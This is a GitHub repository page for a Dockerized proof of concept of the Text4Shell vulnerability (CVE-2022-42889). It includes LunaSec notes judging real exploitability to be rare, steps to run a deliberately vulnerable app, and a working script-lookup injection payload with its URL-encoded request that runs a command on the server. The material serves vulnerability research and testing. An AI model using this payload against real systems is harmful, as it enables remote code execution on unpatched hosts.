Skip to content

Dockerized POC for CVE-2022-42889 Text4Shell (with LunaSec research notes)

Notifications You must be signed in to change notification settings

lunasec-io/cve-2022-42889-text4shell-docker

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

LunaSec Notes

LunaSec research notes from us investigating Text4Shell as a part of our blost post about the vulnerability.

We've determined that it's very unlikely that Text4Shell is exploitable in 99.999% of the usages of Apache Commons Text because very few people seem to be using the createInterpolator() method.

Our research focussed on other ways that Apache Commons Text could invole the script handler, but we were unable to find any other ways to do so (even setting flags like setEnableSubstitutionInVariables to true or using recursive variable resolution).

You can see our notes in the HelloController.java file. The file in the Test folder is how we were testing this quickly. (We're using IntelliJ, so you can just run the test from there if you have that setup.)

Original Readme

Install maven - maven-linux


  1. Maven install to create the fat jar
mvn clean install
  1. Docker build
docker build --tag=text4shell .
  1. Docker run
docker run -p 80:8080 text4shell
  1. Test the app
http://localhost/text4shell/attack?search=<anything>
  1. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. You can also try using dns or url prefixes.

  2. Get the container id

docker container ls
  1. Get into the app
docker exec -it <container_id> bash
  1. To check if above RCE was successful (You should see a file named foo created in the /tmp directory):
ls /tmp/
  1. To stop the container
docker container stop <container_id>

About

Dockerized POC for CVE-2022-42889 Text4Shell (with LunaSec research notes)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 99.4%
  • Dockerfile 0.6%